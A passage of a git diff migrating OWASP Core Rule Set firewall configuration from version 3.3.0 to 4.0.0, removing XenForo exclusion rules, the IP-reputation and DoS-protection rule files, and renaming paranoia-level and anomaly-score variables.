REQUEST_FILENAME "@endsWith /account/account-details" \ - "id:9006320,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=931130;ARGS:custom_fields[picture],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:about_html,\ - ver:'OWASP_CRS/3.3.0'" - -# Lost password -# POST /xf/lost-password/user-name.12345/confirm?c=foo -SecRule REQUEST_FILENAME "@rx /lost-password/.*\.\d+/confirm$" \ - "id:9006330,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:c,\ - ver:'OWASP_CRS/3.3.0'" - -# Set forum signature -# POST /xf/account/signature -SecRule REQUEST_FILENAME "@endsWith /account/signature" \ - "id:9006340,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:signature_html,\ - ver:'OWASP_CRS/3.3.0'" - -# Search -# POST /xf/search/search -SecRule REQUEST_FILENAME "@endsWith /search/search" \ - "id:9006400,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:keywords,\ - ctl:ruleRemoveTargetById=942200;ARGS:constraints,\ - ctl:ruleRemoveTargetById=942260;ARGS:constraints,\ - ctl:ruleRemoveTargetById=942340;ARGS:constraints,\ - ctl:ruleRemoveTargetById=942370;ARGS:constraints,\ - ver:'OWASP_CRS/3.3.0'" - -# Search within thread -# GET /xf/threads/foo.12345/page12?highlight=foo -SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/(?:page\d+)?$" \ - "id:9006410,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:highlight,\ - ver:'OWASP_CRS/3.3.0'" - -# Search within search result -# GET /xf/search/12345/?q=foo -SecRule REQUEST_FILENAME "@rx /search/\d+/$" \ - "id:9006420,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:q,\ - ver:'OWASP_CRS/3.3.0'" - -# Contact form -# POST /xf/misc/contact -SecRule REQUEST_FILENAME "@endsWith /misc/contact" \ - "id:9006500,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:subject,\ - ver:'OWASP_CRS/3.3.0'" - -# Report post -# POST /xf/posts/12345/report -SecRule REQUEST_FILENAME "@rx /posts/\d+/report$" \ - "id:9006510,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ - ver:'OWASP_CRS/3.3.0'" - -# Alternate thread view route -# /xf/index.php?threads/title-having-some-sql.12345/ -# -# Especially threads with the HAVING sql keyword are FP prone. -# This rule has some chains to narrow down the exclusion, -# making it harder for an attacker to abuse the ARGS_NAMES -# exclusion on other endpoints. -SecRule REQUEST_FILENAME "@endsWith /index.php" \ - "id:9006600,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule REQUEST_METHOD "@streq GET" \ - "t:none,\ - chain" - SecRule &ARGS "@eq 1" \ - "t:none,\ - chain" - SecRule REQUEST_URI "@rx /index\.php\?threads/.*\.\d+/$" \ - "t:none,\ - ctl:ruleRemoveTargetById=942100;ARGS_NAMES,\ - ctl:ruleRemoveTargetById=942230;ARGS_NAMES" - -# Browser fingerprint (DBTech security extension) -# May Contain various javascript/XSS false positives -SecRule REQUEST_URI "@endsWith /index.php?dbtech-security/fingerprint" \ - "id:9006700,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[14][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[15][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[16][value],\ - ver:'OWASP_CRS/3.3.0'" - -# Get location info -SecRule REQUEST_FILENAME "@endsWith /misc/location-info" \ - "id:9006710,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:location,\ - ver:'OWASP_CRS/3.3.0'" - -# -# -=[ XenForo Global Exclusions ]=- -# - -# _xfRedirect, _xfRequestUri can appear on various endpoints. -# Cookies can appear on all endpoints. - -SecAction \ - "id:9006800,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=931120;ARGS:_xfRedirect,\ - ctl:ruleRemoveTargetById=941150;ARGS:_xfRedirect,\ - ctl:ruleRemoveTargetById=942230;ARGS:_xfRedirect,\ - ctl:ruleRemoveTargetById=942260;ARGS:_xfRedirect,\ - ctl:ruleRemoveTargetById=931120;ARGS:_xfRequestUri,\ - ctl:ruleRemoveTargetById=941150;ARGS:_xfRequestUri,\ - ctl:ruleRemoveTargetById=942130;ARGS:_xfRequestUri,\ - ctl:ruleRemoveTargetById=942230;ARGS:_xfRequestUri,\ - ctl:ruleRemoveTargetById=942260;ARGS:_xfRequestUri,\ - ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_csrf,\ - ctl:ruleRemoveTargetById=942210;REQUEST_COOKIES:xf_csrf,\ - ctl:ruleRemoveTargetById=942440;REQUEST_COOKIES:xf_csrf,\ - ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_emoji_usage,\ - ctl:ruleRemoveTargetById=942150;REQUEST_COOKIES:xf_emoji_usage,\ - ctl:ruleRemoveTargetById=942410;REQUEST_COOKIES:xf_emoji_usage,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;REQUEST_COOKIES:xf_ls,\ - ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_session,\ - ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_user,\ - ver:'OWASP_CRS/3.3.0'" - -# -# -=[ XenForo Administration Back-End ]=- -# - -# Skip this section for performance unless requested file is admin.php - -SecRule REQUEST_FILENAME "!@endsWith /admin.php" \ - "id:9006900,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-XENFORO-ADMIN" - -SecRule REQUEST_FILENAME "!@endsWith /admin.php" \ - "id:9006901,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-XENFORO-ADMIN" - -# Admin edit user -# POST /xf/admin.php?users/the-user-name.12345/edit -SecRule REQUEST_URI "@rx /admin\.php\?users/.*\.\d+/edit$" \ - "id:9006910,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[about],\ - ctl:ruleRemoveTargetById=931130;ARGS:profile[website],\ - ver:'OWASP_CRS/3.3.0'" - -# Admin save user -# POST /xf/admin.php?users/the-user-name.12345/save -# Runs in phase 1 to be able to remove rule 200003. -SecRule REQUEST_URI "@rx /admin\.php\?users/.*\.\d+/save$" \ - "id:9006920,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveById=200003,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[occupation],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[personal_quote],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[about],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[signature],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[sexuality],\ - ctl:ruleRemoveTargetById=931130;ARGS:custom_fields[picture],\ - ctl:ruleRemoveTargetById=931130;ARGS:profile[website],\ - ver:'OWASP_CRS/3.3.0'" - - -# Admin edit forum notice -# POST /xf/admin.php?notices/0/save -# POST /xf/admin.php?notices/forum-name.12345/save -SecRule REQUEST_URI "@rx /admin\.php\?notices/(?:.*\.)?\d+/save$" \ - "id:9006930,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\ - ver:'OWASP_CRS/3.3.0'" - -# Admin batch thread update -# POST /xf/admin.php?threads/batch-update/action -SecRule REQUEST_URI "@rx /admin\.php\?(?:threads|users)/batch-update/action$" \ - "id:9006940,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=942200;ARGS:criteria,\ - ctl:ruleRemoveTargetById=942260;ARGS:criteria,\ - ctl:ruleRemoveTargetById=942330;ARGS:criteria,\ - ctl:ruleRemoveTargetById=942340;ARGS:criteria,\ - ctl:ruleRemoveTargetById=942370;ARGS:criteria,\ - ver:'OWASP_CRS/3.3.0'" - -# Edit forum theme -# POST /xf/admin.php?styles/title.1234/style-properties/group&group=basic -SecRule REQUEST_URI "@rx /admin\.php\?styles/" \ - "id:9006950,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=942200;ARGS:json,\ - ctl:ruleRemoveTargetById=942260;ARGS:json,\ - ctl:ruleRemoveTargetById=942300;ARGS:json,\ - ctl:ruleRemoveTargetById=942330;ARGS:json,\ - ctl:ruleRemoveTargetById=942340;ARGS:json,\ - ctl:ruleRemoveTargetById=942370;ARGS:json,\ - ctl:ruleRemoveTargetById=942440;ARGS:json,\ - ver:'OWASP_CRS/3.3.0'" - -# Set forum options -# POST /xf/admin.php?options/update -SecRule REQUEST_URI "@rx /admin\.php\?options/update" \ - "id:9006960,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:options[boardInactiveMessage],\ - ver:'OWASP_CRS/3.3.0'" - -# Edit pages/templates -# POST /xf/admin.php?pages/0/save -# POST /xf/admin.php?pages/foo.12345/save -# POST /xf/admin.php?templates/foo.1234/save -SecRule REQUEST_URI "@rx /admin\.php\?(?:pages|templates)/.*/save" \ - "id:9006970,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:template,\ - ver:'OWASP_CRS/3.3.0'" - -SecMarker "END-XENFORO-ADMIN" - -SecMarker "END-XENFORO" diff --git a/rules/REQUEST-905-COMMON-EXCEPTIONS.conf b/rules/REQUEST-905-COMMON-EXCEPTIONS.conf index 75191b10c6..67fde5b48a 100644 --- a/rules/REQUEST-905-COMMON-EXCEPTIONS.conf +++ b/rules/REQUEST-905-COMMON-EXCEPTIONS.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -23,11 +24,11 @@ SecRule REQUEST_LINE "@streq GET /" \ tag:'language-multi',\ tag:'platform-apache',\ tag:'attack-generic',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ chain" SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ "t:none,\ - ctl:ruleEngine=Off,\ + ctl:ruleRemoveByTag=OWASP_CRS,\ ctl:auditEngine=Off" # @@ -43,12 +44,12 @@ SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ tag:'language-multi',\ tag:'platform-apache',\ tag:'attack-generic',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ chain" SecRule REQUEST_HEADERS:User-Agent "@endsWith (internal dummy connection)" \ "t:none,\ chain" SecRule REQUEST_LINE "@rx ^(?:GET /|OPTIONS \*) HTTP/[12]\.[01]$" \ "t:none,\ - ctl:ruleEngine=Off,\ + ctl:ruleRemoveByTag=OWASP_CRS,\ ctl:auditEngine=Off" diff --git a/rules/REQUEST-910-IP-REPUTATION.conf b/rules/REQUEST-910-IP-REPUTATION.conf deleted file mode 100644 index 904654af82..0000000000 --- a/rules/REQUEST-910-IP-REPUTATION.conf +++ /dev/null @@ -1,326 +0,0 @@ -# ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 -# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. -# -# The OWASP ModSecurity Core Rule Set is distributed under -# Apache Software License (ASL) version 2 -# Please see the enclosed LICENSE file for full details. -# ------------------------------------------------------------------------ - -# -# -= Paranoia Level 0 (empty) =- (apply unconditionally) -# - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:910011,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:910012,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" -# -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) -# - -# -# -=[ IP Reputation Block Flag Check ]=- -# -# The first check we do is to see if the client IP address has already -# been blacklisted by rules from previous requests. -# -# If the rule matches, it will do a skipAfter and pick up processing -# at the end of the request phase for actual blocking. -# -SecRule TX:DO_REPUT_BLOCK "@eq 1" \ - "id:910000,\ - phase:2,\ - block,\ - t:none,\ - msg:'Request from Known Malicious Client (Based on previous traffic violations)',\ - logdata:'Previous Block Reason: %{ip.reput_block_reason}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-ip',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - chain,\ - skipAfter:BEGIN-REQUEST-BLOCKING-EVAL" - SecRule IP:REPUT_BLOCK_FLAG "@eq 1" \ - "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - - -# -# -=[ GeoIP Checks ]=- -# -# This rule requires activating the SecGeoLookupDB directive -# in the crs-setup.conf file and specifying -# the list of blocked countries (tx.high_risk_country_codes). -# -# This rule does a GeoIP resolution on the client IP address. -# -SecRule TX:HIGH_RISK_COUNTRY_CODES "!@rx ^$" \ - "id:910100,\ - phase:2,\ - block,\ - t:none,\ - msg:'Client IP is from a HIGH Risk Country Location',\ - logdata:'%{MATCHED_VAR}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-ip',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - chain" - SecRule TX:REAL_IP "@geoLookup" \ - "chain" - SecRule GEO:COUNTRY_CODE "@within %{tx.high_risk_country_codes}" \ - "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'ip.reput_block_flag=1',\ - setvar:'ip.reput_block_reason=%{rule.msg}',\ - expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" - - -# -# -=[ IP Reputation Checks ]=- -# -# ModSecurity Rules from Trustwave SpiderLabs: IP Blacklist Alert -# Ref: http://www.modsecurity.org/projects/commercial/rules/ -# -# This rule checks the client IP address against a list of recent IPs captured -# from the SpiderLabs web honeypot systems (last 48 hours). -# -#SecRule TX:REAL_IP "@ipMatchFromFile ip_blacklist.data" \ -# "id:910110,\ -# phase:2,\ -# block,\ -# t:none,\ -# msg:'Client IP in Trustwave SpiderLabs IP Reputation Blacklist',\ -# tag:'application-multi',\ -# tag:'language-multi',\ -# tag:'platform-multi',\ -# tag:'attack-reputation-ip',\ -# tag:'paranoia-level/1',\ -# severity:'CRITICAL',\ -# setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ -# setvar:'ip.reput_block_flag=1',\ -# setvar:'ip.reput_block_reason=%{rule.msg}',\ -# expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" - - -# -# First check if we have already run an @rbl check for this IP by checking in IP collection. -# If we have, then skip doing another check. -# -SecRule IP:PREVIOUS_RBL_CHECK "@eq 1" \ - "id:910120,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-ip',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-RBL-LOOKUP" - -# -# Check Client IP against ProjectHoneypot's HTTP Blacklist -# Ref: http://www.projecthoneypot.org/httpbl_api.php -# -# To use the blacklist, you must register for an HttpBL API Key -# and choose the traffic types to block. See section -# "Project Honey Pot HTTP Blacklist" in crs-setup.conf. -# -# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecHttpBlKey -# - -# Skip HttpBL checks if user has not defined one of the TX:block_* variables. -# This prevents error "Operator error: RBL httpBl called but no key defined: set SecHttpBlKey" -SecRule &TX:block_suspicious_ip "@eq 0" \ - "id:910130,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - ver:'OWASP_CRS/3.3.0',\ - chain,\ - skipAfter:END-RBL-CHECK" - SecRule &TX:block_harvester_ip "@eq 0" \ - "chain" - SecRule &TX:block_spammer_ip "@eq 0" \ - "chain" - SecRule &TX:block_search_ip "@eq 0" - -SecRule TX:REAL_IP "@rbl dnsbl.httpbl.org" \ - "id:910140,\ - phase:2,\ - pass,\ - capture,\ - t:none,\ - nolog,\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-ip',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.httpbl_msg=%{tx.0}',\ - chain" - SecRule TX:httpbl_msg "@rx RBL lookup of .*?.dnsbl.httpbl.org succeeded at TX:checkip. (.*?): .*" \ - "capture,\ - t:none,\ - setvar:'tx.httpbl_msg=%{tx.1}'" - -# The following regexs are generated based off re_operators.c -SecRule TX:block_search_ip "@eq 1" \ - "id:910150,\ - phase:2,\ - block,\ - t:none,\ - msg:'HTTP Blacklist match for search engine IP',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-ip',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - chain,\ - skipAfter:END-RBL-CHECK" - SecRule TX:httpbl_msg "@rx Search Engine" \ - "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'ip.reput_block_flag=1',\ - setvar:'ip.reput_block_reason=%{rule.msg}',\ - setvar:'ip.previous_rbl_check=1',\ - expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\ - expirevar:'ip.previous_rbl_check=86400'" - -SecRule TX:block_spammer_ip "@eq 1" \ - "id:910160,\ - phase:2,\ - block,\ - t:none,\ - msg:'HTTP Blacklist match for spammer IP',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-ip',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - chain,\ - skipAfter:END-RBL-CHECK" - SecRule TX:httpbl_msg "@rx (?i)^.*? spammer .*?$" \ - "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'ip.reput_block_flag=1',\ - setvar:'ip.reput_block_reason=%{rule.msg}',\ - setvar:'ip.previous_rbl_check=1',\ - expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\ - expirevar:'ip.previous_rbl_check=86400'" - -SecRule TX:block_suspicious_ip "@eq 1" \ - "id:910170,\ - phase:2,\ - block,\ - t:none,\ - msg:'HTTP Blacklist match for suspicious IP',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-ip',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - chain,\ - skipAfter:END-RBL-CHECK" - SecRule TX:httpbl_msg "@rx (?i)^.*? suspicious .*?$" \ - "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'ip.reput_block_flag=1',\ - setvar:'ip.reput_block_reason=%{rule.msg}',\ - setvar:'ip.previous_rbl_check=1',\ - expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\ - expirevar:'ip.previous_rbl_check=86400'" - -SecRule TX:block_harvester_ip "@eq 1" \ - "id:910180,\ - phase:2,\ - block,\ - t:none,\ - msg:'HTTP Blacklist match for harvester IP',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-ip',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - chain,\ - skipAfter:END-RBL-CHECK" - SecRule TX:httpbl_msg "@rx (?i)^.*? harvester .*?$" \ - "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'ip.reput_block_flag=1',\ - setvar:'ip.reput_block_reason=%{rule.msg}',\ - setvar:'ip.previous_rbl_check=1',\ - expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\ - expirevar:'ip.previous_rbl_check=86400'" - -SecAction \ - "id:910190,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-ip',\ - tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'ip.previous_rbl_check=1',\ - expirevar:'ip.previous_rbl_check=86400'" - -SecMarker "END-RBL-LOOKUP" - -SecMarker "END-RBL-CHECK" - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:910013,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:910014,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" -# -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) -# - - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:910015,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:910016,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" -# -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) -# - - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:910017,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:910018,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" -# -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) -# - - - -# -# -= Paranoia Levels Finished =- -# -SecMarker "END-REQUEST-910-IP-REPUTATION" diff --git a/rules/REQUEST-911-METHOD-ENFORCEMENT.conf b/rules/REQUEST-911-METHOD-ENFORCEMENT.conf index d37729783c..e5171c4141 100644 --- a/rules/REQUEST-911-METHOD-ENFORCEMENT.conf +++ b/rules/REQUEST-911-METHOD-ENFORCEMENT.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -13,10 +14,10 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # @@ -26,7 +27,7 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,skipAf # SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \ "id:911100,\ - phase:2,\ + phase:1,\ block,\ msg:'Method is not allowed by policy',\ logdata:'%{MATCHED_VAR}',\ @@ -38,33 +39,33 @@ SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/274',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:911015,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911015,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-912-DOS-PROTECTION.conf b/rules/REQUEST-912-DOS-PROTECTION.conf deleted file mode 100644 index 4bad25893d..0000000000 --- a/rules/REQUEST-912-DOS-PROTECTION.conf +++ /dev/null @@ -1,328 +0,0 @@ -# ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 -# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. -# -# The OWASP ModSecurity Core Rule Set is distributed under -# Apache Software License (ASL) version 2 -# Please see the enclosed LICENSE file for full details. -# ------------------------------------------------------------------------ - -# -# Anti-Automation rules to detect Denial of Service attacks. -# -# Description of mechanics: -# When a request hits a non-static resource (TX:STATIC_EXTENSIONS), then a counter for the IP -# address is being raised (IP:DOS_COUNTER). If the counter (IP:DOS_COUNTER) hits a limit -# (TX:DOS_COUNTER_THRESHOLD), then a burst is identified (IP:DOS_BURST_COUNTER) and the -# counter (IP:DOS_COUNTER) is reset. The burst counter expires within a timeout period -# (TX:DOS_BURST_TIME_SLICE). -# If the burst counter (IP:DOS_BURST_COUNTER) is greater equal 2, then the blocking flag -# is being set (IP:DOS_BLOCK). The blocking flag (IP:DOS_BLOCK) expires within a timeout -# period (TX:DOS_BLOCK_TIMEOUT). All this counting happens in phase 5. -# There is a stricter sibling to 